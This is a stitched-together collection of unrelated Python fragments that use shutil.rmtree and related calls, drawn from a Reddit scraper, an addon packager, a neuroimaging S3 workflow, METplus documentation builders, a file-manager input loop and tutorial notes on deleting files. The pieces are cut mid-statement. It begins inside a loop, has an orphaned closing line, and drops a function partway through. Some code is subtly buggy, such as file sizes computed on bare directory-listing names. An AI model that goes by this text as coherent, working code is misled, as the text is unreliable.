        if f.startswith("GORG_"):
            rs_id = f[:-4]
            print(rs_id)
            call(command.format(id=rs_id), shell=True)

    "checkm taxonomy_wf -x fna -t20 genus Prochlorococcus nucleotides/fnas/ checkm > static_data/checkm.txt"
    shutil.rmtree("static_data")
def fetch_submissions(subreddit, limit=None, export=False, user_agent='submission.fetch.bot'):
    # print([(x, subreddit[x]) for x in subreddit])
    after = None
    save_directory = 'submissions'
    fetched_submissions = 0
    submission_index = []
    submissions = []

    if export:
        # clear out any previous export, then recreate the directory
        if os.path.isdir(save_directory):
            try:
                shutil.rmtree(save_directory)
            except OSError:
                pass
        try:
            os.mkdir(save_directory)
        except OSError:
            pass

    while after or not fetched_submissions:
        if after:
            req_url = 'https://www.reddit.com' + subreddit['url'] + '.json?limit=100&after=' + after
        else:
            req_url = 'https://www.reddit.com' + subreddit['url'] + '.json?limit=100'
        req = requests.get(req_url, headers={'User-agent': user_agent})
        try:
            after = req.json()['data']['after']
            for s in [r['data'] for r in req.json()['data']['children']]:
                submission_index.append({
                    'id': s['id'],
                    'name': s['name'],
                    'title': s['title'],
                    'permalink': s['permalink']
                })
                if export:
                    try:
                        os.mkdir(save_directory + '/' + subreddit['id'])
                    except OSError:
                        pass
                submissions.append(s)
                if export:
                    # save submission to file
                    with open(save_directory + '/' + subreddit['id'] + '/' + s['id'] + '.json', 'w') as file:
                        json.dump(s, file, indent=4)
                fetched_submissions += 1
                log.info(f'Fetched submission #{fetched_submissions} {s["id"]} for subreddit {subreddit["id"]}...')
                if limit and fetched_submissions >= limit:
                    after = None
                    break
        except Exception as e:
            log.error('Exception occurred!')
            log.error(str(e))

    subreddit_submission_index = {
        'subreddit_id': subreddit['id'],
        'subreddit_title': subreddit['title'],
        'submissions': submission_index
    }
    if export:
        with open(save_directory + '/' + subreddit['id'] + '/index.json', 'w') as file:
            json.dump(subreddit_submission_index, file, indent=4)
    return subreddit_submission_index, submissions
def publish_version(version, install=False):
    # make the staging area
    # stagepath = "addon_name"+_+version  # OLD
    stagepath = addon_name
    print("Building target: " + stagepath)
    if os.path.isdir(stagepath):
        shutil.rmtree(stagepath)
    os.mkdir(stagepath)

    # file by file, copy and do replacements
    for fil in files:
        if os.path.isdir(fil):
            newdirname = os.path.join(stagepath, fil)
            shutil.copytree(fil, newdirname,
                            ignore=ignore_patterns)  # will have some .DS_Store's
        else:
            fname = fil
            newname = os.path.join(stagepath, fil)
            inFile = codecs.open(fname, "r", "utf-8")
            outFile = codecs.open(newname, "w", "utf-8")
            for line in inFile:
                newline = do_replacements_on(line, version)
                outFile.write(newline)
            inFile.close()
            outFile.close()

    # zip and remove
    def old_method(stagepath):
        p = Popen(['zip', '-r', stagepath + '.zip', stagepath],
                  stdin=PIPE, stdout=PIPE, stderr=PIPE)
        stdout, err = p.communicate(b"")

    old_method(stagepath)
    # new zip method, to skip .DS's
    # with zipfile.ZipFile(stagepath+".zip", 'w') as myzip:
    #     filezips = os.listdir(stagepath)
    #     for file in filezips:
    #         if file != '.DS_Store':
    #             myzip.write(file)

    if install:
        installedpath = os.path.join(addonpath, addon_name + "_" + version)
        if not os.path.isdir(installedpath):
            print("creating folder:")
            print(installedpath)
            os.mkdir(installedpath)
        else:
            try:
                shutil.rmtree(os.path.join(addonpath, addon_name + "_" + version,
                                           "__pycache__"))
            except OSError:
                print("No cache to delete")
        for fil in files:
            stagefile = os.path.join(stagepath, fil)
            p = Popen(['mv', stagefile, installedpath],
                      stdin=PIPE, stdout=PIPE, stderr=PIPE)
            stdout, err = p.communicate(b"")
    shutil.rmtree(stagepath)
    os.rename(stagepath + '.zip', os.path.join(build_dir, stagepath + '.zip'))
def niconn_workflow(mask_img=None, prefix=None, output_dir=None,
                    ns_data_dir=None, rs_data_dir=None, work_dir=None):
    if mask_img is None or not op.isfile(mask_img):
        raise Exception('A valid NIFTI file is required!')

    if prefix is None:
        prefix = op.basename(mask_img).split('.')[0]

    if output_dir is None:
        output_dir = op.join(op.dirname(op.abspath(mask_img)), prefix)
    os.makedirs(output_dir, exist_ok=True)

    macm_out_dir = op.join(output_dir, 'macm')
    os.makedirs(macm_out_dir, exist_ok=True)
    rsfc_out_dir = op.join(output_dir, 'rsfc')
    os.makedirs(rsfc_out_dir, exist_ok=True)

    if ns_data_dir is None:
        ns_data_dir = op.join(output_dir, 'neurosynth_dataset')
    os.makedirs(ns_data_dir, exist_ok=True)

    if rs_data_dir is None:
        rs_data_dir = op.join(output_dir, 'hcp1200_resting-state')
    if not op.isdir(rs_data_dir):
        os.makedirs(rs_data_dir)
        download_hcp = True

    if work_dir is None:
        work_dir = op.join(output_dir, 'niconn-work')
    os.makedirs(work_dir, exist_ok=True)

    macm_work_dir = op.join(work_dir, 'macm')
    os.makedirs(macm_work_dir, exist_ok=True)
    rsfc_work_dir = op.join(work_dir, 'rsfc')
    os.makedirs(rsfc_work_dir, exist_ok=True)

    img = nib.load(mask_img)
    inds = np.nonzero(img.get_data())
    inds = np.transpose(inds)

    macm_suffix = 'logp_level-voxel_corr-FWE_method-permutation'
    rsfc_suffix = 'thresh_zstat'

    for tmpind in inds:
        vox = np.dot(img.affine, np.append(tmpind, 1))
        vox = vox[0:3].astype(int)
        coords_str = '{x}_{y}_{z}'.format(x=str(vox[0]), y=str(vox[1]), z=str(vox[2]))

        # MACMs first
        macm_get_request = requests.get(
            'https://niconn.s3.amazonaws.com/macm/{coords_str}/{coords_str}_{macm_suffix}.nii.gz'
            .format(coords_str=coords_str, macm_suffix=macm_suffix))
        if macm_get_request.status_code == 404:
            tmp_work_dir = op.join(macm_work_dir, coords_str)
            os.makedirs(tmp_work_dir, exist_ok=True)
            macm_workflow(x=vox[0], y=vox[1], z=vox[2],
                          ns_data_dir=ns_data_dir, output_dir=tmp_work_dir)
            suffix = ['z',
                      'logp_level-voxel_corr-FWE_method-permutation',
                      'logp_level-cluster_corr-FWE_method-permutation']
            for tmp_suffix in suffix:
                tmp_fn = op.join(tmp_work_dir,
                                 '{coords_str}_{suffix}.nii.gz'.format(coords_str=coords_str, suffix=tmp_suffix))
                aws_fn = op.join('macm', coords_str, op.basename(tmp_fn))
                macm_put_request = requests.post(
                    'https://niconn.s3.amazonaws.com/',
                    files={'file': open(tmp_fn, 'rb')},
                    data={'key': aws_fn})
            shutil.rmtree(tmp_work_dir)
            macm_get_request = requests.get(
                'https://niconn.s3.amazonaws.com/macm/{coords_str}/{coords_str}_{macm_suffix}.nii.gz'
                .format(coords_str=coords_str, macm_suffix=macm_suffix))

        with open(op.join(macm_work_dir,
                          '{coords_str}_{suffix}.nii.gz'.format(coords_str=coords_str, suffix=macm_suffix)),
                  'wb') as f:
            f.write(macm_get_request.content)

        # now resting-state
        rsfc_get_request = requests.get(
            'https://niconn.s3.amazonaws.com/rsfc/{coords_str}/{coords_str}_{rsfc_suffix}.nii.gz'
            .format(coords_str=coords_str, rsfc_suffix=rsfc_suffix))
        if rsfc_get_request.status_code == 404:
            tmp_work_dir = op.join(rsfc_work_dir, coords_str)
            os.makedirs(tmp_work_dir, exist_ok=True)
            rs_workflow(x=vox[0], y=vox[1], z=vox[2],
                        rs_data_dir=rs_data_dir, output_dir=tmp_work_dir)
            suffix = ['tstat1', 'tstat1_thr001', 'vox_corrp']
            for tmp_suffix in suffix:
                tmp_fn = op.join(tmp_work_dir,
                                 '{coords_str}_{suffix}.nii.gz'.format(coords_str=coords_str, suffix=tmp_suffix))
                aws_fn = op.join('rsfc', coords_str, op.basename(tmp_fn))
                rsfc_put_request = requests.post(
                    'https://niconn.s3.amazonaws.com/',
                    files={'file': open(tmp_fn, 'rb')},
                    data={'key': aws_fn})
            shutil.rmtree(tmp_work_dir)
            rsfc_get_request = requests.get(
                'https://niconn.s3.amazonaws.com/rsfc/{coords_str}/{coords_str}_{rsfc_suffix}.nii.gz'
                .format(coords_str=coords_str, rsfc_suffix=rsfc_suffix))

        with open(op.join(rsfc_work_dir,
                          '{coords_str}_{suffix}.nii.gz'.format(coords_str=coords_str, suffix=rsfc_suffix)),
                  'wb') as f:
            f.write(rsfc_get_request.content)

    # evaluate MACMs now
    macm_img_list = sorted(
        glob(op.join(macm_work_dir, '*_{suffix}.nii.gz'.format(suffix=macm_suffix))))
    fishers_workflow(img_list=macm_img_list,
                     prefix='ibma_{prefix}'.format(prefix=prefix),
                     output_dir=macm_out_dir)
    macm(prefix='true_{prefix}'.format(prefix=prefix),
         mask=mask_img, output_dir=macm_out_dir, ns_data_dir=ns_data_dir)

    # evaluate rsFC now
    rsfc_img_list = sorted(
        glob(op.join(rsfc_work_dir, '*_{suffix}.nii.gz'.format(suffix=rsfc_suffix))))
      len(notFoundInRow[:-2].split(",")))

#If an old items directory and list exist
if os.path.isdir("../data/items"):
    oldSize = sum(os.path.getsize(f) for f in os.listdir("../data/items") if os.path.isfile(f))
    newSize = sum(os.path.getsize(f) for f in os.listdir("../data/items" + startTime) if os.path.isfile(f))
    #If the new list is bigger than the old one
    if newSize > oldSize - 1024:
        #Remove the old directory
        shutil.rmtree("../data/items")
        #Rename the new directory to replace the old one
        os.rename("../data/items" + startTime, "../data/items")
        print "\nNew item list has been created and replaced the old one."
        print "You can find the new data in ../data/items/"
    #If the new list is smaller
    else:
        print "\nNew item list was smaller than old list; both files retained."
        print "You can find the new data in ../data/items" + startTime + "/"
#If the old items directory and list did not exist
else:
    #Delete the old directory if it exists
    if os.path.isdir("../data/items"):
        shutil.rmtree("../data/items")
    #Rename the new directory to replace the old one
    os.rename("../data/items" + startTime, "../data/items")
def remove_dir(path):
    try:
        shutil.rmtree(path)
        print('Folder removed at {}'.format(path))
    except FileNotFoundError:
        print('folder does not exist')
def main():
    build_pdf = os.environ.get('METPLUS_DOC_PDF')
    if build_pdf:
        print("PDF output enabled")

    # check if sphinx_gallery module is available and error/exit if not
    sphinx_gallery_spec = importlib.util.find_spec("sphinx_gallery")
    if sphinx_gallery_spec is None:
        print("ERROR: Must have sphinx_gallery Python module installed to build documentation")
        sys.exit(1)

    # regex expressions to remove from HTML output
    regex_compiles = [
        re.compile(r'<p><a class="reference download internal".*?</p>'),
        re.compile(r'<div class="sphx-glr-download-link-note[\s\S]*?</div>', re.MULTILINE),
        re.compile(r'<p class="sphx-glr-timing.*?</p>'),
        re.compile(r'<p>sphinx_gallery_thumbnail_path.*?</p>'),
    ]

    # docs directory
    docs_dir = os.getcwd()

    # generated use case HTML output
    generated_dir = os.path.join(docs_dir, '_build', 'html', 'generated')

    # User's Guide use case HTML output
    users_guide_dir = os.path.join(docs_dir, '_build', 'html', 'Users_Guide')

    # directory where doxygen Makefile exists
    doxygen_dir = os.path.join(docs_dir, 'doxygen', 'run')

    # run make to generate the documentation files
    run_command(f"make clean html {'pdf' if build_pdf else ''}", docs_dir)

    # build the doxygen documentation
    run_command("make clean all", doxygen_dir)

    # copy doxygen documentation into _build/html/doxygen
    doxygen_generated = os.path.join(docs_dir, 'generated', 'doxygen', 'html')
    doxygen_output = os.path.join(docs_dir, '_build', 'html', 'doxygen')

    # remove the doxygen output dir if it already exists
    if os.path.exists(doxygen_output):
        print(f"Removing {doxygen_output}")
        shutil.rmtree(doxygen_output)

    print(f"Copying doxygen files from {doxygen_generated} to {doxygen_output}")
    shutil.copytree(doxygen_generated, doxygen_output)

    # remove download buttons
    print(f"Removing download buttons from files under {generated_dir}")
    for dirpath, _, all_files in os.walk(generated_dir):
        for filename in sorted(all_files):
            doc_file = os.path.join(dirpath, filename)
            if not doc_file.endswith('.html'):
                continue
            with open(doc_file, 'r+') as file_handle:
                text = file_handle.read()
                for regex_compile in regex_compiles:
                    text = re.sub(regex_compile, '', text)
                file_handle.seek(0)
                file_handle.write(text)
                file_handle.truncate()

    # create symbolic links under Users_Guide directory to point to dirs under generated
    run_command("ln -s ../generated/met_tool_wrapper", users_guide_dir)
    run_command("ln -s ../generated/model_applications", users_guide_dir)

    print("Documentation build completed")
def main():
    # check if release is in any command line argument
    is_release = any(['release' in arg for arg in sys.argv])
    skip_doxygen = any(['skip-doxygen' in arg for arg in sys.argv])

    # check if sphinx_gallery module is available and error/exit if not
    sphinx_gallery_spec = importlib.util.find_spec("sphinx_gallery")
    if sphinx_gallery_spec is None:
        print("ERROR: Must have sphinx_gallery Python module installed to build documentation")
        sys.exit(1)

    # regex expressions to remove from HTML output
    regex_compiles = [
        re.compile(r'<p><a class="reference download internal".*?</p>'),
        re.compile(r'<div class="sphx-glr-download-link-note[\s\S]*?</div>', re.MULTILINE),
        re.compile(r'<p class="sphx-glr-timing.*?</p>'),
        re.compile(r'<p>sphinx_gallery_thumbnail_path.*?</p>'),
    ]

    # docs directory
    # docs_dir will be set to the directory that this script is in
    # __file__ is a variable that contains the path to the module that is
    # currently being imported
    docs_dir = os.path.abspath(os.path.dirname(__file__))
    package_dir = os.path.join(docs_dir, os.pardir, 'metplus')

    # update release_date file if creating a release
    if is_release:
        write_release_date_file(package_dir)

    # generated use case HTML output
    generated_dir = os.path.join(docs_dir, '_build', 'html', 'generated')

    # User's Guide use case HTML output
    users_guide_dir = os.path.join(docs_dir, '_build', 'html', 'Users_Guide')

    # directory where doxygen Makefile exists
    doxygen_dir = os.path.join(docs_dir, 'doxygen', 'run')

    # run make to generate the documentation files
    run_command("make clean html", docs_dir)

    if not skip_doxygen:
        # build the doxygen documentation
        run_command("make clean all", doxygen_dir)

        # copy doxygen documentation into _build/html/doxygen
        doxygen_generated = os.path.join(docs_dir, 'generated', 'doxygen', 'html')
        doxygen_output = os.path.join(docs_dir, '_build', 'html', 'doxygen')

        # remove the doxygen output dir if it already exists
        if os.path.exists(doxygen_output):
            print(f"Removing {doxygen_output}")
            shutil.rmtree(doxygen_output)

        print(f"Copying doxygen files from {doxygen_generated} to {doxygen_output}")
        shutil.copytree(doxygen_generated, doxygen_output)

    # remove download buttons
    print(f"Removing download buttons from files under {generated_dir}")
    for dirpath, _, all_files in os.walk(generated_dir):
        for filename in sorted(all_files):
            doc_file = os.path.join(dirpath, filename)
            if not doc_file.endswith('.html'):
                continue
            with open(doc_file, 'r+') as file_handle:
                text = file_handle.read()
                for regex_compile in regex_compiles:
                    text = re.sub(regex_compile, '', text)
                file_handle.seek(0)
                file_handle.write(text)
                file_handle.truncate()

    # create symbolic links under Users_Guide directory to point to dirs under generated
    run_command("ln -s ../generated/met_tool_wrapper", users_guide_dir)
    run_command("ln -s ../generated/model_applications", users_guide_dir)

    warning_file = os.path.join(docs_dir, '_build', 'warnings.log')
    if os.stat(warning_file).st_size == 0:
        print(f"No warnings found, removing {warning_file}")
        os.remove(warning_file)

    print("Documentation build completed")
import os
import shutil

while True:
    arr = input().split()
    if arr[0] == 'create_folder':
        os.mkdir(arr[1])
    elif arr[0] == 'delete_folder':
        shutil.rmtree(arr[1])
    elif arr[0] == 'remove_folder':
        shutil.move(arr[1], arr[2])
    elif arr[0] == 'copy_folder':
        shutil.copytree(arr[1], arr[2])
    elif arr[0] == 'create_file':
        f = open(arr[1], 'w')
        f.close()
    elif arr[0] == 'delete_file':
        os.remove(arr[1])
    elif arr[0] == 'remove_file':
        shutil.move(arr[1], arr[2])
    elif arr[0] == 'copy_file':
        shutil.copy(arr[1], arr[2])
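# Example session for the command loop above (illustrative input lines):
#
#   create_folder demo
#   create_file demo/a.txt
#   copy_folder demo demo_copy
#   delete_folder demo_copy      (recursive delete via shutil.rmtree)
#   delete_file demo/a.txt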
shutil.copy('eggs.txt', 'C:\\delicious\\eggs2.txt')
shutil.copytree('C:\\bacon', 'C:\\bacon_backup')

#%% moving
shutil.move('C:\\bacon.txt', 'C:\\eggs')
shutil.move('spam.txt', 'c:\\does_not_exist\\eggs\\ham')  # ERROR

#%% deleting - permanently!!!
os.unlink('path')       # deletes a file
os.rmdir('path')        # only empty folders
shutil.rmtree('path')   # a folder and everything in it

for filename in os.listdir():
    if filename.endswith('.rxt'):
        #os.unlink(filename)  # be careful
        print(filename)  # run it first to see what you are about to delete

#%% it's better to send to the system Trash
# install the third-party send2trash package
# $ pip install send2trash
import send2trash

baconFile = open('bacon.txt', 'a')  # creates the file
baconFile.write('Bacon is not a vegetable.')
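#%% a usage sketch for send2trash: unlike os.unlink or shutil.rmtree, this
# moves the file to the OS trash, where it can still be recovered
baconFile.close()
send2trash.send2trash('bacon.txt')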
def remove_extra_files():
    # Remove GitHub Actions files unless they are necessary
    if context['use_github'] == 'no' or context['continuous_integration'] != 'github_actions':
        # remove the .github directory and everything in it
        shutil.rmtree('.github/')